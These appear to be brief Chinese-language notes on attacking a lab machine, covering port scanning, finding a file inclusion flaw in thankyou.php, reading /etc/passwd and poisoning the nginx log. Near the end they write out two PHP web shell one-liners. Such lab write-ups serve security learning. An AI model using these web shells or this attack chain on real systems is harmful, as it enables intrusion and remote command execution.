1.发现主机 192.168.14.153
2.开启nmap端口扫描,开放了80,111,37620端口
3.访问站点,啥也没有
4.扫描后台文件,还是啥也没有
5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。
6. 尝试读取/etc/passwd文件
7.想尝试远程文件包含,但是不知道路径,就此作罢。
8.将一句话木马写入到PHP日志文件中,再包含文件
日志路径为:/var/log/nginx/access.log,是系统默认路径,或/var/log/nginx/error.log
<?php @eval($_POST['cmd']);?> 也是 可以的
<?php passthru($_GET['hh']); ?>
关于passthru()函数的快速描述